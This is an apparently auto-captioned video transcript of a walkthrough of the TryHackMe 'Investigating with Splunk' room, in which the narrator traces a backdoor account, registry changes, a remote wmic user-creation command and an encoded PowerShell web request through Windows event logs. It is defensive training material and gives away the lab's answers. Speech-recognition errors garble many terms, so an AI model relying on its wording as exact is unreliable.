Cyber Incident Investigation with Splunk | TryHackMe Investigating with Splunk

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on guys welcome back today we're doing a bit of challenge with Splunk so the room name is investigating with Splunk and we're given a scenario we're required to answer the questions in an attempt to analyze what happened and what was the reason or the key artifacts of the bridge so if you read the description it says silk analyst Johnny has observed some anomalous behaviors in the logs of a few Windows machines so that's where the incident happened and when a Windows workstation it looks like the adverse already has access to some of these machines and successfully created some backdoor his manager has asked him to pull those logs from suspected hosts and ingest them into Splunk for quick investigation so there you go a Windows machine or a couple of Windows machines have been compromised the windows event logs have been pulled and uploaded to Splunk for quick investigation we are required to find out what happened our task as a silk analysis to examine the logs and identify the anomalies okay so deploying the machine here we have Splunk now the data has been uploaded and it's available to access the data as we mentioned in the previous video when when you upload data you create an index the index for the data is index equal Main and by retrieving the index we will retrieve all the events make sure to click on all time and we have a total of 12 256 events that's as it for the first question okay on one of the infected hosts the adversary you are successful in creating a backdoor user what is the username Okay so basically we're looking to find out how the username has been created we have two methods we can either search for the command or we can search for the event ID so here on the left we have event IDs over 55 and if we look at the command we don't have a filter or field for command line so we're gonna filter by event ID and specifically we're going to filter for event ID that refers to a user creation so that happens to be 4 7 2 0. four seven two zero and that would give us only one event which actually indicates the or that user account was created so finding out the account name we scroll down and we see it's a one Berto it's Alberto but the one or the uh one he replaces the L so that's the account name or the username that has been created on the same host I would use to the key was also updated regarding the new backdoor user what's the full path of that register key so here we're looking to find out all the events where a registry key has been added modified or deleted so if we take a look at the left we can see the category and we can see the top 10 values of the event of the events categories you can see this registry object added or deleted exactly describes the question so a register key ad deleted we click on that and we have 1496 events all right so to filter these down more we're looking to find out the these events that are related to the new bacter user which happens to be a one and now we narrowed down the the number to Two so we have two events and from here we can find out the registry key that has been deleted as you can see delete key and this is the key how about the other event if we take a look down there we see hit create key but we're not looking to uh keys that were created we're looking at for the keys that were modified or updated or deleted which happens to be this key so user account has been created and a register key was modified as such examined logs and identify the user that the adversary was trying to impersonate so basically adversary has created a backdoor user it is A1 virtual so by choosing this name they were trying to impersonate a specifically or a currently existing username so we have to take a look again at the current users in the host and see which one is similar to A1 virtual so we have Alberto that's the real one Alberto that's the real username okay the bacter one the fake version was A1 Berto the real one is Alberto that is the name that attacker was trying to impersonate so that they go undetected in the attack so up until now the attacker got access they created one username or a back to username called A1 virtual that looks similar to Alberto next what's the command used to add a backdoor user from a remote computer so from here we are trying to find out how the username A1 virtue has been created okay there must be a command that has been executed from a remote computer why because the windows machines have been compromised of course from the attacker computer which is a remote computer attacker executed a command on their machine the remote computer to add the backdoor user we want to find out this command how we ended up with this command here okay so if we go back index Main and here we search for net user so that's the only command that's actually used to add a username so net username scrolling down taking a look at the fields here so we're looking to find out the exact command but we ended up with one six thousand events four users if we narrow this down to Alberto we have three in the command line we have three commands but these are not the commands we're looking for so we're going to go back let's see here 's the attacker executed the command from a remote computer so not exactly the username so we're looking for here net user we have 6 000 events we have to narrow this down somehow if we search for wmic 89 comma 89 events still we are far from the answer we're looking here to find out the exact command but we're getting too many events for the net user ad okay going back so the attacker first they got access as one of these users this user is the original user how about James command line four command lines so why I selected James here basically James could be the username that the attacker got access to when they first compromised the machine so if I look at the command lines command line field I see four interesting commands and I can see this one see Windows season 32 wmic indicating development indicates that the attacker got access through Powershell specifically evil winner and executed this command to add the user A1 inverter so A1 verto is a bacter username that has been query with this command starting from the first Axis or the first foothold account which was James so that's the command how many times was the login attempt from the back to user observed during the investigation how many times was the looking attempt from the back door user observed through the investigation how many times they locked in with the bacterization bacteria the name is A1 Berto want to find out in the category here what are the events we're looking to find if there is a log on so there is no log on means there is no log in or successful log in with this username taking a look at the event IDs we have eight event IDs and none of these event IDs match to a successful or failed login attempt which means we are left with zero what's the name of the infected host on which suspicious partial commands were executed so here we have we are trying also to find out the hostname of the infected machine we already found that the username was James so if we go back and type Powershell just departure as you can see here it gives you all of the partial commands that have been executed and the host happens to be James Brown partial logging is enabled on this device how many events were locked for the malicious partial execution partially logging is a feature that lets you log all of the partial commands executed on a specific host the catch is once you enable partial logging an event ID is triggered in Windows the event ID is 4103 so we want to find out how many events were generated as a result of Powershell logging we have to filter for this event ID so events four one zero three exactly we have 79 events and encoded partial script from the infected host initiated the web request what's the full URL hey back to Porsche so we want to decode the command that has been executed today is exactly one only one command which is this one so we're looking to decode this command scrolling all the way down so let's copy all of that and we will go to cyber gif from page 64. we can delete all of these and down there okay so we have decoded the base64 but as you can see we need some encoding some modifications on the output so we're going to use decode decode text so this is text I'm going to need to decode this to us to uh formula that we can understand utf-8 exactly not good if you have a six seven sixteen this one sounds good okay so now if we scroll down we see here the user agent time we set user agent we see a base64 string right after this thing we have directory or path indicating that a new a page named news.php or a file named news has been accessed so that's the path of the URL what about the URL itself I'm going to duplicate this copy the page 64. probably this basic 64 if we decode it we will have the URL full URL as you can see it is the IP address now if you take that Slash new so PHP we have the full URL but we need to write the fully one in a specific formula uh as you can see defend the URL so we go to um let's see remove these and this is the final answer that was an intermediate challenge with Splunk it didn't involve so many filters so many processing search queries in Splunk it was just simple analysis of an incidence it's required us to understand the event IDs and how to jump between different stitches during a compromise okay guys I hope you like that and I will definitely see you in the next video

Info

Channel: Motasem Hamdan

Views: 12,843

Rating: undefined out of 5

Keywords:

Id: S9hkw-fsO5Q

Channel Id: undefined

Length: 14min 27sec (867 seconds)

Published: Tue Nov 08 2022